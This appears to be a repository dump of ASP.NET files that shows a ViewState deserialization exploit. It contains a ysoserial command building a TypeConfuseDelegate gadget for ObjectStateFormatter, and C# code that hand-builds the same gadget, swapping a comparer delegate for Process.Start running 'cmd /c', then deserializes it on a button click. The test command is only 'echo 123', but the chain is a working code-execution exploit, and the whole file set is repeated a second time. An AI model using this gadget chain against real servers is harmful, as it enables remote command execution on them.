vncloudsco/Test.aspx

## backen.aspx
using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text.RegularExpressions;
using System.Text;
using System.IO;
public partial class hello : System.Web.UI.Page
{
 protected void Page_Load(object sender, EventArgs e)
 {
}

protected void Button1_Click(object sender, EventArgs e)
 {
 Label1.Text = TextArea1.Text.ToString();
 }
}

## ecode.aspx
<%@ Page Language=”C#” AutoEventWireup=”true” CodeFile=”hello.aspx.cs” Inherits=”hello” %>
<!DOCTYPE html>
<html xmlns=”http://www.w3.org/1999/xhtml">
<head runat=”server”>
 <title></title>
</head>
<body>
 <form id=”form1" runat=”server”>
 <asp:TextBox id=”TextArea1" TextMode=”multiline” Columns=”50" Rows=”5" runat=”server” />
 <asp:Button ID=”Button1" runat=”server” OnClick=”Button1_Click”
 Text=”GO” class=”btn”/>
 <br />
 <asp:Label ID=”Label1" runat=”server”></asp:Label>
 </form>
</body>
</html>

## fix.aspx
using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text.RegularExpressions;
using System.Text;
using System.IO;
public class BasePage : System.Web.UI.Page
{
 protected override void Render(HtmlTextWriter writer)
 {
 StringBuilder sb = new StringBuilder();
 StringWriter sw = new StringWriter(sb);
 HtmlTextWriter hWriter = new HtmlTextWriter(sw);
 base.Render(hWriter);
 string html = sb.ToString();
 html = Regex.Replace(html, “<input[^>]*id=\”(__VIEWSTATE)\”[^>]*>”, string.Empty, RegexOptions.IgnoreCase);
 writer.Write(html);
 }
}
public partial class hello : BasePage
{
 protected void Page_Load(object sender, EventArgs e)
 {
}

 protected void Button1_Click(object sender, EventArgs e)
 {
 Label1.Text = TextArea1.Text.ToString();
 }
}

## payload
ysoserial.exe -o base64 -g TypeConfuseDelegate
 -f ObjectStateFormatter -c "echo 123 > C:\Windows\temp\test.txt" > payload_when_mac_disabled

## Test.aspx
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="TestComment.aspx.cs" Inherits="TestComment" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
<asp:TextBox id="TextArea1" TextMode="multiline" Columns="50" Rows="5" runat="server" />
<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="GO" />
<br />
<br />
<br />
<asp:Label ID="Label1" runat="server"></asp:Label>
</form>
</body>
</html>

## Test.aspx.cs
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class TestComment : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
String cmd = “echo 123 > c:\\windows\\temp\\test.txt”;
Delegate da = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
IComparer<string> comp = Comparer<string>.Create(d);
SortedSet<string> set = new SortedSet<string>(comp);
set.Add(“cmd”);
set.Add(“/c “ + cmd);
FieldInfo fi = typeof(MulticastDelegate).GetField(“_invocationList”, BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
// Modify the invocation list to add Process::Start(string, string)
invoke_list[1] = new Func<string, string, Process>(Process.Start);
fi.SetValue(d, invoke_list);
MemoryStream stream = new MemoryStream();
Stream stream1 = new FileStream(“C:\\Windows\\Temp\\serialnet.txt”, FileMode.Create, FileAccess.Write);
//Serialization using LOSFormatter starts here
//The serialized output is base64 encoded which cannot be directly fed to ObjectStateFormatter for deserialization hence requires base64 decoding before deserialization
LosFormatter los = new LosFormatter();
los.Serialize(stream1, set);
stream1.Close();
}
protected void Button1_Click(object sender, EventArgs e)
{
string serialized_data = File.ReadAllText(@”C:\Windows\Temp\serialnet.txt”);
//Base64 decode the serialized data before deserialization
byte[] bytes = Convert.FromBase64String(serialized_data);
//Deserialization using ObjectStateFormatter starts here
ObjectStateFormatter osf = new ObjectStateFormatter();
string test = osf.Deserialize(Convert.ToBase64String(bytes)).ToString();
}
}
	using System;
	using System.Collections.Generic;
	using System.Web;
	using System.Web.UI;
	using System.Web.UI.WebControls;
	using System.Text.RegularExpressions;
	using System.Text;
	using System.IO;
	public partial class hello : System.Web.UI.Page
	{
	protected void Page_Load(object sender, EventArgs e)
	{
	}

	protected void Button1_Click(object sender, EventArgs e)
	{
	Label1.Text = TextArea1.Text.ToString();
	}
	}
	<%@ Page Language=”C#” AutoEventWireup=”true” CodeFile=”hello.aspx.cs” Inherits=”hello” %>
	<!DOCTYPE html>
	<html xmlns=”http://www.w3.org/1999/xhtml">
	<head runat=”server”>
	<title></title>
	</head>
	<body>
	<form id=”form1" runat=”server”>
	<asp:TextBox id=”TextArea1" TextMode=”multiline” Columns=”50" Rows=”5" runat=”server” />
	<asp:Button ID=”Button1" runat=”server” OnClick=”Button1_Click”
	Text=”GO” class=”btn”/>
	<br />
	<asp:Label ID=”Label1" runat=”server”></asp:Label>
	</form>
	</body>
	</html>
	ysoserial.exe -o base64 -g TypeConfuseDelegate
	-f ObjectStateFormatter -c "echo 123 > C:\Windows\temp\test.txt" > payload_when_mac_disabled
	<%@ Page Language="C#" AutoEventWireup="true" CodeFile="TestComment.aspx.cs" Inherits="TestComment" %>
	<!DOCTYPE html>
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head runat="server">
	<title></title>
	</head>
	<body>
	<form id="form1" runat="server">
	<asp:TextBox id="TextArea1" TextMode="multiline" Columns="50" Rows="5" runat="server" />
	<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="GO" />
	<br />
	<br />
	<br />
	<asp:Label ID="Label1" runat="server"></asp:Label>
	</form>
	</body>
	</html>
	using System;
	using System.Collections.Generic;
	using System.Configuration;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Reflection;
	using System.Web;
	using System.Web.UI;
	using System.Web.UI.WebControls;
	public partial class TestComment : System.Web.UI.Page
	{
	protected void Page_Load(object sender, EventArgs e)
	{
	String cmd = “echo 123 > c:\\windows\\temp\\test.txt”;
	Delegate da = new Comparison<string>(String.Compare);
	Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
	IComparer<string> comp = Comparer<string>.Create(d);
	SortedSet<string> set = new SortedSet<string>(comp);
	set.Add(“cmd”);
	set.Add(“/c “ + cmd);
	FieldInfo fi = typeof(MulticastDelegate).GetField(“_invocationList”, BindingFlags.NonPublic \| BindingFlags.Instance);
	object[] invoke_list = d.GetInvocationList();
	// Modify the invocation list to add Process::Start(string, string)
	invoke_list[1] = new Func<string, string, Process>(Process.Start);
	fi.SetValue(d, invoke_list);
	MemoryStream stream = new MemoryStream();
	Stream stream1 = new FileStream(“C:\\Windows\\Temp\\serialnet.txt”, FileMode.Create, FileAccess.Write);
	//Serialization using LOSFormatter starts here
	//The serialized output is base64 encoded which cannot be directly fed to ObjectStateFormatter for deserialization hence requires base64 decoding before deserialization
	LosFormatter los = new LosFormatter();
	los.Serialize(stream1, set);
	stream1.Close();
	}
	protected void Button1_Click(object sender, EventArgs e)
	{
	string serialized_data = File.ReadAllText(@”C:\Windows\Temp\serialnet.txt”);
	//Base64 decode the serialized data before deserialization
	byte[] bytes = Convert.FromBase64String(serialized_data);
	//Deserialization using ObjectStateFormatter starts here
	ObjectStateFormatter osf = new ObjectStateFormatter();
	string test = osf.Deserialize(Convert.ToBase64String(bytes)).ToString();
	}
	}